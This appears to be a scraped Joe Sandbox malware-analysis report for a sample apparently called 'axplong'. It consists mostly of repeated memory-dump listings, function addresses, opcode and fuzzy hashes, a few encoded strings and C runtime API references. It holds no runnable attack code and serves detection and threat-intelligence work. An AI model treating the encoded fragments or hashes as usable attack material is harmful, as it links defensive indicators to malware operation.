Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 1d2d49e91d0f7f96c4cf87367b80f46ab2bf4c92930c3fc28d76c943089fc8b2
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: 9E51BA7120C63857CB389AF8B9967BFE79E9F52300F14085DE442F76EECA159D488362

Function 008F4CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 580813ec231af8d693831234a62ad496673b1066266c8758196e884e8bbe147a
Instruction ID: 022e3a69648d08134b33eedc8d68a8b37766b74a8c7bc351dd25c856dd4c91f6
Opcode Fuzzy Hash: 580813ec231af8d693831234a62ad496673b1066266c8758196e884e8bbe147a
Instruction Fuzzy Hash: 3E2260B3F516144BDB0CCB9DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9159644

Function 00989680 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4aa6af43c1367ca745eabb1047c121027503ea7ce38618528e175ef99267a41
Instruction ID: 5a45a6487bf4455219177a914687e728e5a10a0128752b663e6f2f21c3b7a410
Opcode Fuzzy Hash: a4aa6af43c1367ca745eabb1047c121027503ea7ce38618528e175ef99267a41
Instruction Fuzzy Hash: 00A1B2F3F6162547F3484979CD993A26A43DB95304F2F82388F5CAB7C6D87E9C0A5284

Function 00936F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b95eaa64fa774b492cff7dd440c45592065bf0bd30ef8cc8eecd979f893f968
Instruction ID: 5fd1109b568781bcabe664f5b21ff09983a75c5496099f2d633be2f93abddfde
Opcode Fuzzy Hash: 8b95eaa64fa774b492cff7dd440c45592065bf0bd30ef8cc8eecd979f893f968
Instruction Fuzzy Hash: 6DB15CB2214609DFD729CF68C486B65BBE1FF45364F258658E899CF2A1C335E982CF40

Function 008F4AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1031be439d47967e2718aee60b8896fb34fe0fc512a12e1f725f63e19f4451b9
Instruction ID: ca421bda8e7f04ab3daf27567864e5b9c10368f9e1e43f23477df13939351b60
Opcode Fuzzy Hash: 1031be439d47967e2718aee60b8896fb34fe0fc512a12e1f725f63e19f4451b9
Instruction Fuzzy Hash: DF51BF706083918FC319CF29851563BBBE1BFD5200F484A9EE1D687292D774DA48CBE2

Function 0093777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a750f8067d703067beb059887e9232a9782f555c84d5e381117c66e0003c6d20
Instruction ID: 0bae550d57824bc3e689f9788fe9ea6bf50d4cf9e1407f58984f6f7bf2858954
Opcode Fuzzy Hash: a750f8067d703067beb059887e9232a9782f555c84d5e381117c66e0003c6d20
Instruction Fuzzy Hash: 9D21B673F205394B770CC47E8C5727DB6E1C78C541745423AE8A6EA2C1D968D917E2E4

Function 0093765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e72bbe1a294ed262a39ba797f66cf825f66f5ac73f54dd9b630afb56048e0710
Instruction ID: defa0690e563b1bafea1ae9c41687605d8ef009b19830cfedf1d11d48157f024
Opcode Fuzzy Hash: e72bbe1a294ed262a39ba797f66cf825f66f5ac73f54dd9b630afb56048e0710
Instruction Fuzzy Hash: 0F11CA63F30C255B675C81BD8C1327AA1D2DBD824070F433AD826E7384E994DE23D390

Function 00938720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: af94e5ad77977dcc2ac3425a01e83fb5f07e6e13e5965d5055d5afc7f04e094b
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 7F11B6BB20034247D615862DD9F85B7A7DFEBC5321F3D437AF0538B658DA229945DD00

Function 0092645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 829c0b89d9d87ee51a0c67683b54b22a695ca68c6a59a0c3782d22640b81a0ca
Instruction ID: 6f969b4c927e73aa47073f21ff53b3111c00ccf8443dd79536daffb5a293c58d
Opcode Fuzzy Hash: 829c0b89d9d87ee51a0c67683b54b22a695ca68c6a59a0c3782d22640b81a0ca
Instruction Fuzzy Hash: E4E08C30041A18AFCF25BB18EC59B4D3B2AEB82395F008800F84456672CB35FC92C980

Function 0092A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: a888eabb4a3942a8cd03f378d37419527cc923d99ce02dc457ec351c7a2845d5
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 93E0B672919238EBCB15DB98AA44A8AF3ECEB89B50F554496B501D3256C270DF10CBD1

Function 00902E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

246122658369, xrefs: 009033D4
8KG0fymoFx==, xrefs: 00902EC7
HBhr, xrefs: 0090378F
invalid stoi argument, xrefs: 0090425A
WGt=, xrefs: 009033BA
Fz==, xrefs: 0090369E
stoi argument out of range, xrefs: 00904269

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
API String ID: 0-2390467879
Opcode ID: dedb2f63a9af85ff8fbde39fd2b3fa2cab2fa96dc83e0dd3877b64e8aa715ec5
Instruction ID: 8d8ad94ea361b16bf395080e7dad20804c252fceacc7dc8f2bfd2645f0701fd5
Opcode Fuzzy Hash: dedb2f63a9af85ff8fbde39fd2b3fa2cab2fa96dc83e0dd3877b64e8aa715ec5
Instruction Fuzzy Hash: 9E02B070A04249EFEF14DFA8C849BDEBBB5AF45314F508158E805A72C2D7759A84CFA1

Function 00924770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 009247A7
___except_validate_context_record.LIBVCRUNTIME ref: 009247AF
_ValidateLocalCookies.LIBCMT ref: 00924838
__IsNonwritableInCurrentImage.LIBCMT ref: 00924863
_ValidateLocalCookies.LIBCMT ref: 009248B8

Strings

csm, xrefs: 0092484D

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 8dca29e5df98f37217c019ad4fc4012b5e3624a73e979e998b236dac678a7323
Instruction ID: f012c30f257066a7528520624eb5319f60dad5a0257c32baa62a2532231da36a
Opcode Fuzzy Hash: 8dca29e5df98f37217c019ad4fc4012b5e3624a73e979e998b236dac678a7323
Instruction Fuzzy Hash: 4E51E734A21268ABCF10DF68EC85AAE7FB9BF46314F148055E8149B35AD731DE05CF90

Function 009270C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0092710B

Strings

.cmd, xrefs: 00927129
.bat, xrefs: 0092713A
.exe, xrefs: 00927118
.com, xrefs: 0092714B

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: b60adde084c9567386ace3570a6b8e4242d9648f733880382d355aa87bc56664
Instruction ID: 47a743f0bdb734152054afe01118f0441526826644303613eb34642170f4ec06
Opcode Fuzzy Hash: b60adde084c9567386ace3570a6b8e4242d9648f733880382d355aa87bc56664
Instruction Fuzzy Hash: 4B01DB3760C6362656186599BC02B3B979CAFC7BB8729002BF944F73C7EE44DC524190

Function 008F2E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 008F2F1F
__Mtx_unlock.LIBCPMT ref: 008F2F8C
__Cnd_broadcast.LIBCPMT ref: 008F2FA3
__Mtx_unlock.LIBCPMT ref: 008F30B5
__Mtx_unlock.LIBCPMT ref: 008F315B

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 21a350a3f35c9f98bcbda7a935874fd8c4d00baec0c3a17fafb18e8ff1a8146f
Instruction ID: 7e93902344701eadad237b9995b39bae533fdf900b1d8f7b2ed0a85764698957
Opcode Fuzzy Hash: 21a350a3f35c9f98bcbda7a935874fd8c4d00baec0c3a17fafb18e8ff1a8146f
Instruction Fuzzy Hash: 82A1E0B0A0170A9FDB21DF74C844BAAB7F8FF55314F14822AE915D7281EB31EA04CB91

Function 0092C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0092CA37

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

